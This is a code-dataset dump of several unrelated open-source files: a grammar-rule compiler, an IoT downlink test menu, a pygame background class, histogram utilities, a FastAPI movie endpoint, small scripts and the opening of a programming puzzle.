sIdAction + \": second argument for define must be a list of strings\")\n sAction = prepareFunction(sAction)\n sAction = sAction.replace(\"m.group(i[4])\", \"m.group(\"+str(iGroup)+\")\")\n for x in re.finditer(\"group[(](\\d+)[)]\", sAction):\n if int(x.group(1)) > nGroup:\n print(\"# error in groups in replacement at line \" + sIdAction + \" (\"+str(nGroup)+\" groups only)\")\n else:\n for x in re.finditer(r\"\\\\(\\d+)\", sAction):\n if int(x.group(1)) > nGroup:\n print(\"# error in groups in replacement at line \" + sIdAction + \" (\"+str(nGroup)+\" groups only)\")\n if re.search(\"[.]\\\\w+[(]\", sAction):\n print(\"# error in action at line \" + sIdAction + \": This action looks like code. 
Line should begin with =\")\n\n \n\n if cAction == \"-\":\n ## error detected\n if not sAction:\n print(\"# error in action at line \" + sIdAction + \": This action is empty.\")\n if sAction[0:1] == \"=\":\n FUNCTIONS.append((\"s\"+sIdAction, sAction[1:]))\n sAction = \"=s\"+sIdAction\n elif sAction.startswith('\"') and sAction.endswith('\"'):\n sAction = sAction[1:-1]\n if not sMsg:\n print(\"# error in action at line \" + sIdAction + \": the message is empty.\")\n return [sCondition, cAction, sAction, iGroup, sMsg, sURL]\n elif cAction == \"~\":\n ## text preprocessor\n if not sAction:\n print(\"# error in action at line \" + sIdAction + \": This action is empty.\")\n if sAction[0:1] == \"=\":\n FUNCTIONS.append((\"p\"+sIdAction, sAction[1:]))\n sAction = \"=p\"+sIdAction\n elif sAction.startswith('\"') and sAction.endswith('\"'):\n sAction = sAction[1:-1]\n return [sCondition, cAction, sAction, iGroup]\n elif cAction == \"=\":\n ## disambiguator\n if sAction[0:1] == \"=\":\n sAction = sAction[1:]\n if not sAction:\n print(\"# error in action at line \" + sIdAction + \": This action is empty.\")\n FUNCTIONS.append((\"d\"+sIdAction, sAction))\n sAction = \"d\"+sIdAction\n return [sCondition, cAction, sAction]\n elif cAction == \">\":\n ## no action, break loop if condition is False\n return [sCondition, cAction, \"\"]\n else:\n echo(\"# Unknown action at line \" + sIdAction)\n return None\n\n\ndef regex2js (sRegex):\n \"converts Python regex to JS regex and returns JS regex and list of negative lookbefore assertions\"\n # Latin letters: http://unicode-table.com/fr/\n # 0-9 and _\n # A-Z\n # a-z\n # À-Ö 00C0-00D6 (upper case)\n # Ø-ß 00D8-00DF (upper case)\n # à-ö 00E0-00F6 (lower case)\n # ø-ÿ 00F8-00FF (lower case)\n # Ā-ʯ 0100-02AF (mixed)\n # -> a-zA-Zà-öÀ-Ö0-9_ø-ÿØ-ßĀ-ʯ\n bCaseInsensitive = False\n if \"(?i)\" in sRegex:\n sRegex = sRegex.replace(\"(?i)\", \"\")\n bCaseInsensitive = True\n lNegLookBeforeRegex = []\n if WORDLIMITLEFT in sRegex:\n sRegex = sRegex.replace(WORDLIMITLEFT, \"\")\n lNegLookBeforeRegex = [\"[a-zA-Zà-öÀ-Ö0-9_ø-ÿØ-ßĀ-ʯ.,–-]$\"]\n sRegex = sRegex.replace(\"[\\\\w\", \"[a-zA-Zà-öÀ-Ö0-9_ø-ÿØ-ßĀ-ʯ\")\n sRegex = sRegex.replace(\"\\\\w\", \"[a-zA-Zà-öÀ-Ö0-9_ø-ÿØ-ßĀ-ʯ]\")\n sRegex = sRegex.replace(\"[.]\", r\"\\.\")\n if not sRegex.startswith(\"\"):\n sRegex = sRegex.replace(\"/\", r\"\\/\")\n m = re.search(r\"\\(\\?\"):\n sRegex = sRegex.replace('', '/').replace('i', '/ig').replace('', '/g')\n else:\n sRegex = \"/\" + sRegex + \"/g\"\n if bCaseInsensitive and not sRegex.endswith(\"/ig\"):\n sRegex = sRegex + \"i\"\n if not lNegLookBeforeRegex:\n lNegLookBeforeRegex = None\n return (sRegex, lNegLookBeforeRegex)\n\n\ndef pyRuleToJS (lRule):\n lRuleJS = copy.deepcopy(lRule)\n del lRule[-1] # tGroups positioning codes are useless for Python\n # error messages\n for aAction in lRuleJS[5]:\n if aAction[1] == \"-\":\n aAction[4] = aAction[4].replace(\"« \", \"« \").replace(\" »\", \" »\")\n # js regexes\n lRuleJS[1], lNegLookBehindRegex = regex2js( JSREGEXES.get(lRuleJS[3], lRuleJS[1]) )\n lRuleJS.append(lNegLookBehindRegex)\n return lRuleJS\n\n\ndef writeRulesToJSArray (lRules):\n s = \"[\\n\"\n for sOption, aRuleGroup in lRules:\n s += ' [\"' + sOption + '\", [\\n' if sOption else \" [false, [\\n\"\n for lRule in aRuleGroup:\n # [sRegex, bCaseInsensitive, sLineId, sRuleId, lActions, aGroups, aNegLookBehindRegex]\n s += ' [' + lRule[0] + \", \"\n s += \"true, \" if lRule[1] else \"false, \"\n s += '\"' + lRule[2] + '\", '\n s += '\"' + lRule[3] + '\", '\n s += 
json.dumps(lRule[4], ensure_ascii=False) + \", \"\n s += json.dumps(lRule[5], ensure_ascii=False) + \", \"\n s += json.dumps(lRule[6], ensure_ascii=False) + \"],\\n\"\n s += \" ]],\\n\"\n s += \"]\"\n return s\n\n\ndef groupsPositioningCodeToList (sGroupsPositioningCode):\n if not sGroupsPositioningCode:\n return None\n return [ int(sCode) if sCode.isdigit() or (sCode[0:1] == \"-\" and sCode[1:].isdigit()) else sCode \\\n for sCode in sGroupsPositioningCode.split(\",\") ]\n\n\ndef _calcRulesStats (lRules):\n d = {'=':0, '~': 0, '-': 0, '>': 0}\n for aRule in lRules:\n for aAction in aRule[5]:\n d[aAction[1]] = d[aAction[1]] + 1\n return (d, len(lRules))\n\n\ndef displayStats (lParagraphRules, lSentenceRules):\n echo(\" {:>18} {:>18} {:>18} {:>18}\".format(\"DISAMBIGUATOR\", \"TEXT PROCESSOR\", \"GRAMMAR CHECKING\", \"REGEX\"))\n d, nRule = _calcRulesStats(lParagraphRules)\n echo(\"§ {:>10} actions {:>10} actions {:>10} actions in {:>8} rules\".format(d['='], d['~'], d['-'], nRule))\n d, nRule = _calcRulesStats(lSentenceRules)\n echo(\"s {:>10} actions {:>10} actions {:>10} actions in {:>8} rules\".format(d['='], d['~'], d['-'], nRule))\n\n\ndef mergeRulesByOption (lRules):\n \"returns a list of tuples [option, list of rules] keeping the rules order\"\n lFinal = []\n lTemp = []\n sOption = None\n for aRule in lRules:\n if aRule[0] != sOption:\n if sOption != None:\n lFinal.append([sOption, lTemp])\n # new tuple\n sOption = aRule[0]\n lTemp = []\n lTemp.append(aRule[1:])\n lFinal.append([sOption, lTemp])\n return lFinal\n\n\ndef prepareOptions (lOptionLines):\n \"returns a dictionary with data about options\"\n sLang = \"\"\n lStructOpt = []\n lOpt = []\n dOptLabel = {}\n for sLine in lOptionLines:\n sLine = sLine.strip()\n if sLine.startswith(\"OPTGROUP/\"):\n m = re.match(\"OPTGROUP/([a-z0-9]+):(.+)$\", sLine)\n lStructOpt.append( (m.group(1), list(map(str.split, m.group(2).split(\",\")))) )\n elif sLine.startswith(\"OPTSOFTWARE:\"):\n lOpt = [ [s, {}] for s in sLine[12:].strip().split() ] # don’t use tuples (s, {}), because unknown to JS\n elif sLine.startswith(\"OPT/\"):\n m = re.match(\"OPT/([a-z0-9]+):(.+)$\", sLine)\n for i, sOpt in enumerate(m.group(2).split()):\n lOpt[i][1][m.group(1)] = eval(sOpt)\n elif sLine.startswith(\"OPTLANG/\"):\n m = re.match(\"OPTLANG/([a-z][a-z](?:_[A-Z][A-Z]|)):(.+)$\", sLine)\n sLang = m.group(1)[:2]\n dOptLabel[sLang] = { \"__optiontitle__\": m.group(2).strip() }\n elif sLine.startswith(\"OPTLABEL/\"):\n m = re.match(\"OPTLABEL/([a-z0-9]+):(.+)$\", sLine)\n dOptLabel[sLang][m.group(1)] = list(map(str.strip, m.group(2).split(\"|\"))) if \"|\" in m.group(2) else [m.group(2).strip(), \"\"]\n else:\n echo(\"# Error. 
Wrong option line in:\\n \")\n echo(sLine)\n echo(\" options defined for: \" + \", \".join([ t[0] for t in lOpt ]))\n dOptions = { \"lStructOpt\": lStructOpt, \"dOptLabel\": dOptLabel }\n dOptions.update({ \"dOpt\"+k: v for k, v in lOpt })\n return dOptions\n\n\ndef make (lRules, sLang, bJavaScript):\n \"compile rules\"\n\n # removing comments, zeroing empty lines, creating definitions, storing tests, merging rule lines\n echo(\" parsing rules...\")\n global DEF\n lLine = []\n lRuleLine = []\n lTest = []\n lOpt = []\n for i, sLine in enumerate(lRules, 1):\n if sLine.startswith('#END'):\n break\n elif sLine.startswith(\"#\"):\n pass\n elif sLine.startswith(\"DEF:\"):\n m = re.match(\"DEF: +([a-zA-Z_][a-zA-Z_0-9]*) +(.+)$\", sLine.strip())\n if m:\n DEF[\"{\"+m.group(1)+\"}\"] = m.group(2)\n else:\n print(\"Error in definition: \", end=\"\")\n echo(sLine.strip())\n elif sLine.startswith(\"TEST:\"):\n lTest.append(\"{:<8}\".format(i) + \" \" + sLine[5:].lstrip())\n elif sLine.startswith(\"TODO:\"):\n pass\n elif sLine.startswith((\"OPTGROUP/\", \"OPTSOFTWARE:\", \"OPT/\", \"OPTLANG/\", \"OPTLABEL/\")):\n lOpt.append(sLine)\n elif re.match(\"[  \\t]*$\", sLine):\n pass\n elif sLine.startswith((\" \", \"\\t\")):\n lRuleLine[len(lRuleLine)-1][1] += \" \" + sLine.strip()\n else:\n lRuleLine.append([i, sLine.strip()])\n\n # generating options files\n echo(\" parsing options...\")\n dOptions = prepareOptions(lOpt)\n #echo(dOptions)\n\n # generating test files\n echo(\" generating test files...\")\n with open(\"tests/\"+sLang+\"/gc_test.txt\", \"w\", encoding=\"utf-8\") as hDstPy, \\\n open(\"gc_lang/\"+sLang+\"/modules-js/tests_data.json\", \"w\", encoding=\"utf-8\") as hDstJS:\n hDstPy.write(\"# TESTS FOR LANG [\"+sLang+\"]\\n\\n\")\n for sLine in lTest:\n hDstPy.write(sLine)\n hDstJS.write('{ \"aData\": ' + json.dumps(lTest, ensure_ascii=False) + \" }\\n\")\n\n # processing\n echo(\" preparing rules...\")\n bParagraph = True\n lParagraphRules = []\n lSentenceRules = []\n lParagraphRulesJS = []\n lSentenceRulesJS = []\n\n for nLine, sLine in lRuleLine:\n if sLine:\n if sLine == \"[++]\":\n bParagraph = False\n else:\n aRule = createRule(sLine, nLine, sLang, bParagraph)\n if aRule:\n if bParagraph:\n lParagraphRules.append(aRule)\n lParagraphRulesJS.append(pyRuleToJS(aRule))\n else:\n lSentenceRules.append(aRule)\n lSentenceRulesJS.append(pyRuleToJS(aRule))\n\n # creating file with all functions callable by rules\n echo(\" creating callables...\")\n with open(\"gc_lang/\"+sLang+\"/modules/gc_tmp_eval.py\", \"w\", encoding=\"utf-8\") as hDstPy, \\\n open(\"gc_lang/\"+sLang+\"/modules-js/gc_tmp_eval.js\", \"w\", encoding=\"utf-8\") as hDstJS:\n hDstPy.write(\"# generated code, do not edit\\n\")\n hDstJS.write(\"// generated code, do not edit\\nconst oEvalFunc = {\\n\")\n for sFuncName, sReturn in FUNCTIONS:\n cType = sFuncName[0:1]\n if cType == \"c\": # condition\n sParams = \"s, sx, m, dDA, sCountry, bCondMemo\"\n elif cType == \"m\": # message\n sParams = \"s, m\"\n elif cType == \"s\": # suggestion\n sParams = \"s, m\"\n elif cType == \"p\": # preprocessor\n sParams = \"s, m\"\n elif cType == \"d\": # disambiguator\n sParams = \"s, m, dDA\"\n else:\n print(\"# Unknown function type in [\" + sFuncName + \"]\")\n continue\n hDstPy.write(\"def {} ({}):\\n\".format(sFuncName, sParams))\n hDstPy.write(\" return \" + sReturn + \"\\n\")\n hDstJS.write(\" {}: function ({})\".format(sFuncName, sParams) + \" {\\n\")\n hDstJS.write(\" return \" + py2js(sReturn) + \";\\n\")\n hDstJS.write(\" },\\n\")\n 
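# Illustrative sketch (assumed example, not an actual build artifact): for a\n # rule condition registered as (\"c1p_1\", 'look(s[m.end():], \"pattern\")'),\n # the loop above writes on the Python side:\n #   def c1p_1 (s, sx, m, dDA, sCountry, bCondMemo):\n #       return look(s[m.end():], \"pattern\")\n # and a matching \"c1p_1: function (s, sx, m, dDA, sCountry, bCondMemo)\"\n # entry on the JavaScript side.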
hDstJS.write(\"}\\n\")\n\n displayStats(lParagraphRules, lSentenceRules)\n\n d = { \"paragraph_rules\": mergeRulesByOption(lParagraphRules),\n \"sentence_rules\": mergeRulesByOption(lSentenceRules),\n \"paragraph_rules_JS\": writeRulesToJSArray(mergeRulesByOption(lParagraphRulesJS)),\n \"sentence_rules_JS\": writeRulesToJSArray(mergeRulesByOption(lSentenceRulesJS)) }\n d.update(dOptions)\n\n return d\n","repo_name":"maelvls/grammalecte","sub_path":"compile_rules.py","file_name":"compile_rules.py","file_ext":"py","file_size_in_byte":26707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3915708331","text":"import server\nimport os\nimport command\nimport time\nimport cases\n\ndev_id=server.get_dev_id()\nos.system(\"cls\")\nserver.connect()\n\nprint(\"Comandos Manuais -- Dev ID: \",dev_id,\"\\n\")\n\nwhile True:\n option = int(input(\"Escolha uma opção:\\n0-Enviar 0077\\n1-Enviar 0033\\n2-Enviar 0011\\n3-Mudar Keep Alive\\n\"\n \"4-Mudar Warn Tx\\n5-Mudar Warn Period\\n6-Mudar Limiar da Bateria\\n7-Mudar Limiar de Luminosidade\\n\"\n \"8-Mudar Configurações do Acelerômetro\\n9-Fazer um Downlink Múltiplo\\n10- Resetar a Placa\\n\"\n \"11- Sair da Interrupção\\n\\nOpção:\"))\n\n print(\"\\n\")\n\n if option == 0:\n server.enviar(\"0077\",6)\n print(\"Downlink 0077 agendado! Aguardando uplink...\")\n server.esperar()\n elif option == 1:\n server.enviar(\"0033\", 5)\n print(\"Downlink 0033 agendado! Aguardando uplink...\")\n server.esperar()\n elif option == 2:\n server.enviar(\"0011\", 3)\n print(\"Downlink 0011 agendado! Aguardando uplink...\")\n server.esperar()\n elif option == 3:\n value = int(input(\"Insira o novo Keep Alive em segundos: \"))\n command.change_keepAlive(value)\n elif option == 4:\n value = int(input(\"Insira o novo Warn Tx em segundos: \"))\n command.change_warnTx(value)\n elif option == 5:\n value = int(input(\"Insira o novo Warn Period em segundos: \"))\n command.change_warnPeriod(value)\n elif option == 6:\n value = float(input(\"Insira o novo Limiar de Bateria: \"))\n command.change_batteryLevel(value)\n elif option == 7:\n value = int(input(\"Insira o novo Limiar de Luz: \"))\n command.change_lum(value)\n elif option == 8:\n # named 'tempo' so the time module is not shadowed (time.sleep is used below)\n tempo = float(input(\"Insira o novo Tempo em segundos: \"))\n queda = int(input(\"Insira o novo Limiar de queda (em mg): \"))\n ang = int(input(\"Insira o novo Limiar de inclinação (em graus): \"))\n command.change_acc(tempo,ang,queda)\n elif option == 9:\n ka = int(input(\"Insira o novo Keep Alive em segundos: \"))\n wtx = int(input(\"Insira o novo Warn Tx em segundos: \"))\n wp = int(input(\"Insira o novo Warn Period em segundos: \"))\n bl = float(input(\"Insira o novo Limiar de Bateria: \"))\n lum = int(input(\"Insira o novo Limiar de Luz: \"))\n tempo = float(input(\"Insira o novo Tempo em segundos: \"))\n queda = int(input(\"Insira o novo Limiar de queda (em mg): \"))\n ang = int(input(\"Insira o novo Limiar de inclinação (em graus): \"))\n command.multiple_downlink(ka,wp,wtx,bl,lum,tempo,ang,queda)\n elif option == 10:\n command.reiniciar()\n elif option == 11:\n cases.stop_interruption()\n else:\n print(\"Comando fora das opções dadas\")\n print(\"Downlink Enviado!\")\n time.sleep(2)\n os.system(\"cls\")\n","repo_name":"IBTI-Brasilia/Furukawa","sub_path":"Furukawa/Documentos Tecnicos/Script Gravação/Scripts
Testes/manual_test.py","file_name":"manual_test.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14077110701","text":"from sqlmodel import Session, create_engine\n\nengine = create_engine(\n 'sqlite:///belte-og-seler.db',\n connect_args={'check_same_thread': False}, # Needed for SQLite\n echo=True, # Log generated SQL\n)\n\n\ndef get_session():\n with Session(engine) as session:\n yield session\n","repo_name":"sthagen/belte-og-seler","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"41094900354","text":"from game import sequenceIntialization,screen,WINDOWWIDTH,WINDOWHEIGHT,INGREDIENTSWIDTH,INGREDIENTSHEIGHT\nimport pygame\n\n# Background class (refreshes the in-game background)\nclass Background():\n\n def __init__(self):\n # background frames\n self.background = []\n\n self.backgroundCount = 0\n\n self.foodGround = pygame.image.load(\"resource/image/background/foodGround.png\")\n self.backgroundCount=0\n\n self.SIDEPANELSIZE=21\n self.sidepanel = pygame.image.load(\"resource/image/ui/sidepanel.png\")\n \"\"\"\n self.ingredients = [pygame.image.load(\"resource/image/ingredients/ing_01.png\"), \\\n pygame.image.load(\"resource/image/ingredients/ing_02.png\"), \\\n pygame.image.load(\"resource/image/ingredients/ing_03.png\"), \\\n pygame.image.load(\"resource/image/ingredients/ing_04.png\"), \\\n pygame.image.load(\"resource/image/ingredients/ing_05.png\"), \\\n pygame.image.load(\"resource/image/ingredients/ing_06.png\")] # ingredient images\n \"\"\"\n self.ingredients = []\n self.ingredients = sequenceIntialization(self.ingredients,8,\"resource/image/ingredients/ingTrans/\",3)\n self.ingredientsTrnasCount=0\n self.ingredientsOutputPos=[0,WINDOWHEIGHT-INGREDIENTSHEIGHT-8]\n self.ingredientsPos = [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0]]\n for i in range(0, len(self.ingredientsPos)):\n self.ingredientsPos[i] = [INGREDIENTSWIDTH * i, WINDOWHEIGHT - INGREDIENTSHEIGHT]\n\n\n def updatefrontofClientLayer(self,ingNum):\n # draw the layer structures in front of the customer\n screen.blit(self.sidepanel, (0, 0))\n screen.blit(self.sidepanel, (WINDOWWIDTH - self.SIDEPANELSIZE, 0))\n screen.blit(self.foodGround, (0, WINDOWHEIGHT - 186))\n if ingNum==0 :\n if self.ingredientsTrnasCount==0:\n screen.blit(self.ingredients[0],self.ingredientsOutputPos)\n else:\n if self.ingredientsTrnasCount!=0:\n self.ingredientsTrnasCount-=1\n screen.blit(self.ingredients[self.ingredientsTrnasCount],self.ingredientsOutputPos)\n elif ingNum==1:\n if self.ingredientsTrnasCount==7:\n screen.blit(self.ingredients[7],self.ingredientsOutputPos)\n else:\n if self.ingredientsTrnasCount!=7:\n self.ingredientsTrnasCount+=1\n screen.blit(self.ingredients[self.ingredientsTrnasCount],self.ingredientsOutputPos)\n\n def setbackground(self,directory):\n while len(self.background)>0 : self.background.pop()\n self.background = sequenceIntialization(self.background, 60, \"resource/image/background/\"+directory, 3)\n\n def backgroundLayerupdate(self,gamescene):\n self.backgroundCount+=1\n if self.backgroundCount>=59:\n self.backgroundCount=0\n if gamescene==0:\n screen.blit(self.background[self.backgroundCount], (0, 0))\n elif gamescene==1:\n screen.blit(self.background[self.backgroundCount],(0,20))\n elif gamescene==2:\n screen.blit(self.background[self.backgroundCount], (0,
0))","repo_name":"l3la3a/termproject","sub_path":"background.py","file_name":"background.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9885617188","text":"n, k = map(int, input().split())\nls = list(map(int, input().split()))\n\nplug = []\nans = 0\nfor i in range(k):\n if ls[i] in plug: # \n continue\n\n elif len(plug) < n:\n plug.append(ls[i])\n continue\n \n tmp = 0\n far_one = 0\n for j in plug:\n if j not in ls[i:]:\n tmp = j\n break\n elif ls[i:].index(j) > far_one:\n far_one = ls[i:].index(j)\n tmp = j\n plug[plug.index(tmp)] = ls[i]\n ans += 1\n\nprint(ans)\n","repo_name":"swanim/Algorithm","sub_path":"baekjoon/2023-05/1700.py","file_name":"1700.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9012012716","text":"from DeepTextSearch import TextEmbedder\nimport pandas as pd\nimport re\n\npoem_data = pd.read_csv(\"data/Arabic Poem Comprehensive Dataset (APCD).csv\")\ndf_hadith = poem_data[(poem_data['العصر'] == 'الحديث')]\n\nverses = list(df_hadith['البيت'])\n# Load data from CSV file\ndef remove_diacritics(text: str) -> str:\n # Remove tashkeel\n text = re.sub(r'[\\u0617-\\u061A\\u064B-\\u0652]', '', text)\n\n # Remove tatweel\n text = re.sub(r'\\u0640', '', text)\n\n return text\n\n\ncleaned_poet = []\nfor x in verses:\n cleaned_verse = remove_diacritics(x)\n cleaned_poet.append(cleaned_verse)\n\n# To use Searching, we must first embed data. After that, we must save all of the data on the local path.\nt_embedder = TextEmbedder()\n\nt_embedder.embed(corpus_list=cleaned_poet)\n\n\n\n","repo_name":"YoussefSaad1/eqtibas","sub_path":"fv_extraction.py","file_name":"fv_extraction.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23985252196","text":"\"\"\"Helper function for histogram handling.\"\"\"\nfrom __future__ import annotations\n\nimport numpy as np\n\nfrom puma.utils.logging import logger\n\n\ndef save_divide(\n numerator,\n denominator,\n default: float = 1.0,\n):\n \"\"\"\n Division using numpy divide function returning default value in cases where\n denominator is 0.\n\n Parameters\n ----------\n numerator: array_like, int, float\n Numerator in the ratio calculation.\n denominator: array_like, int, float\n Denominator in the ratio calculation.\n default: float\n Default value which is returned if denominator is 0.\n\n Returns\n -------\n ratio: array_like, float\n \"\"\"\n if isinstance(numerator, (int, float, np.number)) and isinstance(\n denominator, (int, float, np.number)\n ):\n output_shape = 1\n else:\n try:\n output_shape = denominator.shape\n except AttributeError:\n output_shape = numerator.shape\n\n ratio = np.divide(\n numerator,\n denominator,\n out=np.ones(\n output_shape,\n dtype=float,\n )\n * default,\n where=(denominator != 0),\n )\n if output_shape == 1:\n return float(ratio)\n return ratio\n\n\ndef hist_w_unc(\n arr,\n bins,\n bins_range=None,\n normed: bool = True,\n weights: np.ndarray = None,\n underoverflow: bool = False,\n):\n \"\"\"\n Computes histogram and the associated statistical uncertainty.\n\n Parameters\n ----------\n arr : array_like\n Input data. 
The histogram is computed over the flattened array.\n bins : int or sequence of scalars or str\n `bins` parameter from `np.histogram`\n bins_range : tuple, optional\n `range` parameter from `np.histogram`. This is ignored if `bins` is array like,\n because then the entries of `bins` are used as bin edges.\n normed : bool, optional\n If True (default) the calculated histogram is normalised to an integral\n of 1.\n weights : np.ndarray, optional\n Weights for the input data. Has to be an array of same length as the input\n data with a weight for each entry. If not specified, weight 1 will be given\n to each entry. The uncertainty of bins with weighted entries is\n sqrt(sum_i{w_i^2}) where w_i are the weights of the entries in this bin.\n By default None.\n underoverflow : bool, optional\n Option to include under- and overflow values in outermost bins.\n\n Returns\n -------\n bin_edges : array of dtype float\n Return the bin edges (length(hist)+1)\n hist : numpy array\n The values of the histogram. If normed is true (default), returns the\n normed counts per bin\n unc : numpy array\n Statistical uncertainty per bin.\n If normed is true (default), returns the normed values.\n band : numpy array\n lower uncertainty band location: hist - unc\n If normed is true (default), returns the normed values.\n \"\"\"\n if weights is None:\n weights = np.ones(len(arr))\n\n # Check if there are nan values in the input values\n nan_mask = np.isnan(arr)\n if np.sum(nan_mask) > 0:\n logger.warning(\"Histogram values contain %i nan values!\", np.sum(nan_mask))\n # Remove nan values\n arr = arr[~nan_mask]\n weights = weights[~nan_mask]\n\n # Check if there are inf values in the input values\n inf_mask = np.isinf(arr)\n if np.sum(inf_mask) > 0:\n logger.warning(\"Histogram values contain %i +-inf values!\", np.sum(inf_mask))\n\n # Calculate the counts and the bin edges\n counts, bin_edges = np.histogram(arr, bins=bins, range=bins_range, weights=weights)\n\n # calculate the uncertainty with sum of squared weights (per bin, so we use\n # np.histogram again here)\n unc = np.sqrt(\n np.histogram(arr, bins=bins, range=bins_range, weights=weights**2)[0]\n )\n\n if underoverflow:\n # add two dummy bins (from outermost bins to +-infinity)\n bins_with_overunderflow = np.hstack(\n [np.array([-np.inf]), bin_edges, np.array([np.inf])]\n )\n # recalculate the histogram with this adjusted binning\n counts, _ = np.histogram(arr, bins=bins_with_overunderflow, weights=weights)\n counts[1] += counts[0] # add underflow values to underflow bin\n counts[-2] += counts[-1] # add overflow values to overflow bin\n counts = counts[1:-1] # remove dummy bins\n\n # calculate the sum of squared weights\n sum_squared_weights = np.histogram(\n arr, bins=bins_with_overunderflow, weights=weights**2\n )[0]\n # add sum of squared weights from under/overflow values to under/overflow bin\n sum_squared_weights[1] += sum_squared_weights[0]\n sum_squared_weights[-2] += sum_squared_weights[-1]\n sum_squared_weights = sum_squared_weights[1:-1] # remove dummy bins\n\n unc = np.sqrt(sum_squared_weights) # uncertainty is sqrt(sum_squared_weights)\n\n if normed:\n sum_of_weights = float(np.sum(weights))\n counts = save_divide(counts, sum_of_weights, 0)\n unc = save_divide(unc, sum_of_weights, 0)\n\n band = counts - unc\n hist = counts\n\n return bin_edges, hist, unc, band\n\n\ndef hist_ratio(\n numerator,\n denominator,\n numerator_unc,\n denominator_unc,\n step: bool = True,\n):\n \"\"\"\n This method calculates the ratio of the given bincounts and\n returns 
the input for a step function that plots the ratio.\n\n Parameters\n ----------\n numerator : array_like\n Numerator in the ratio calculation.\n denominator : array_like\n Denominator in the ratio calculation.\n numerator_unc : array_like\n Uncertainty of the numerator.\n denominator_unc : array_like\n Uncertainty of the denominator.\n step : bool\n if True duplicates first bin to match with step plotting function,\n by default True\n\n\n Returns\n -------\n step_ratio : array_like\n Ratio returning 1 in case the denominator is 0.\n step_ratio_unc : array_like\n Stat. uncertainty of the step_ratio\n\n Raises\n ------\n AssertionError\n If inputs don't have the same shape.\n\n \"\"\"\n numerator, denominator, numerator_unc, denominator_unc = (\n np.array(numerator),\n np.array(denominator),\n np.array(numerator_unc),\n np.array(denominator_unc),\n )\n if numerator.shape != denominator.shape:\n raise AssertionError(\"Numerator and denominator don't have the same length\")\n if numerator.shape != numerator_unc.shape:\n raise AssertionError(\"Numerator and numerator_unc don't have the same length\")\n if denominator.shape != denominator_unc.shape:\n raise AssertionError(\"Denominator and denominator_unc don't have the same length\")\n step_ratio = save_divide(numerator, denominator, 1 if step else np.inf)\n\n # Calculate rel uncertainties\n numerator_rel_unc = save_divide(\n numerator_unc, numerator, default=0 if step else np.inf\n )\n denominator_rel_unc = save_divide(\n denominator_unc, denominator, default=0 if step else np.inf\n )\n\n # Calculate rel uncertainty\n step_rel_unc = np.sqrt(numerator_rel_unc**2 + denominator_rel_unc**2)\n\n # Calculate final uncertainty\n step_unc = step_ratio * step_rel_unc\n\n if step:\n # Add an extra bin in the beginning to have the same binning as the input\n # Otherwise, the ratio will not be exactly above each other (due to step)\n step_ratio = np.append(np.array([step_ratio[0]]), step_ratio)\n step_unc = np.append(np.array([step_rel_unc[0]]), step_rel_unc) * step_ratio\n\n return step_ratio, step_unc\n
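\n\n# Minimal usage sketch (illustrative only, kept as comments so it is not part\n# of the library's import-time behaviour):\n#\n#     import numpy as np\n#     values = np.random.default_rng(42).normal(size=1000)\n#     bin_edges, hist, unc, band = hist_w_unc(values, bins=20)\n#     ratio, ratio_unc = hist_ratio(hist, hist, unc, unc, step=False)\n#\n# Here ``ratio`` is 1 in every filled bin and ``band = hist - unc`` is the\n# lower edge of the uncertainty band.\n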
","repo_name":"umami-hep/puma","sub_path":"puma/utils/histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":7701,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"32141778804","text":"#! /usr/bin/python3\n# -*- coding: utf-8 -*-\n'''\n@Time : 2023/1/2 12:04\n@Author : Jocx-H\n@File : movieFrontAction.py\n@Desc : Front-end home page API for movies\n'''\n\n\nimport traceback\nfrom fastapi import APIRouter, Query, Path, HTTPException\nfrom fastapi.encoders import jsonable_encoder\n\nfrom action.msgCodeConf import Code400\nfrom Service import movieFrontService\n\n\n# Build the API router\nrouter = APIRouter(\n prefix=\"/mfront\",\n tags=[\"MovieFront\"],\n)\n\n\n@router.post(\"/movielist\", responses={400: {\"model\": Code400}})\ndef getMovieList(tag: int, page_count: int):\n r\"\"\"\n Return the movie list for one page of the given category\n \"\"\"\n try:\n movies = movieFrontService.getMovieList(tag, page_count)\n except HTTPException as e:\n raise e\n except Exception as e:\n print(repr(e))\n traceback.print_exc()\n raise HTTPException(status_code=400, detail=Code400.detail)\n return jsonable_encoder(movies)","repo_name":"Jocx-H/MovieRecommoned","sub_path":"back/action/movieFrontAction.py","file_name":"movieFrontAction.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16691669579","text":"'''\n## Problem Statement ##\nMunna Bhai is up to his antics again. This time his chacha is coming from the village to see what Munna is doing. This would be all good except that Munna's chacha thinks that Munna is a software programmer. He needs to get a degree fast to prove that he is one. Luckily, he found an institution where, after seeing Munna's enthusiasm, the dean offered him an experimental exam format. He would give Munna 6 exams based on the same problem. He just needs to write the answers for the questions in those exams. The number of exams correctly solved will be the number of certifications Munna receives.\nThe problem was as follows:\nGiven a string of characters and a start and end index, find the number of distinct substrings in the range, both inclusive. Munna being Munna, he wore his airpods to the exam, hidden under his beanie. He tells you the string over the phone and the start and end index.
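For example, for the string 'aabbcc' with start 2 and end 5 the substring is 'bbcc', which has 8 distinct substrings: 'b', 'c', 'bb', 'bc', 'cc', 'bbc', 'bcc', 'bbcc'.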
